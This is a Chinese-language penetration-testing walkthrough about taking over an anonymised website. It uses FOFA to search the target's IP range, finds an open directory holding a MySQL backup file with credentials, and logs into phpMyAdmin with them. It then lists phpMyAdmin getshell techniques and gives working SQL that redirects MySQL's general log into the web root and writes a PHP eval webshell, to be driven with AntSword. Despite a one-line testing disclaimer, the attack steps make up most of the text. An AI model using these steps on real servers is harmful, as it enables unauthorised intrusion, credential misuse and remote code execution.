【滲透實戰(zhàn)系列】|17-巧用fofa對目標網站進行getshell
涉及知識點:
信息搜集目標網站IP利用fofa對目標ip的c段進行搜索發(fā)現數據庫備份文件和管理界面登錄數據庫頁面,進行寫馬寫馬成功,獲取webshell
聲明:本文僅用于安全測試。
1、目標測試網站地址aa.bb.com
通過信息搜集獲取到,該網站地址為ipw為x.x.x.x
2、fofa對目標地址C段進掃描
fofa輸入關鍵字ip=“x.x.x.0/24”進行搜索,意外發(fā)現c段開著8090端口的地址

3、打開http://x.x.x.x:8090發(fā)現遍歷文件目錄,且意外發(fā)現數據庫備份軟件和mysql管理頁面

打開數據庫備份文件mysqlbackup.bat發(fā)現賬戶和密碼

打開mysql管理頁面
http://x.x.x.x/MySQL/ 發(fā)現為phpMyAdmin管理頁面,利用備份文件獲取的賬戶和密碼順利登錄

4、phpMyAdmin寫馬
phpmyadmin后臺getshell的常用手段有以下幾種方式:
1、select into outfile直接寫入2、開啟全局日志getshell3、使用慢查詢日志getsehll4、使用錯誤日志getshell5、利用phpmyadmin4.8.x本地文件包含漏洞getshell
執(zhí)行以下sql語句
show variables like '%secure%';
發(fā)現沒有寫入權限,無法用select into outfile方法寫入shell。我們再來看一下第二種方法,利用全局變量general_log去getshell

我們將全局日志開啟并將保存日志的目錄設為web目錄
set global general_log=on;# 開啟日志set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';# 設置日志位置為網站目錄
設置成功

此時執(zhí)行如下語句即可寫入webshell到hack.php中
select '<?php eval($_POST[whoami]); ?>'
用蟻劍連接即可

評論
圖片
表情
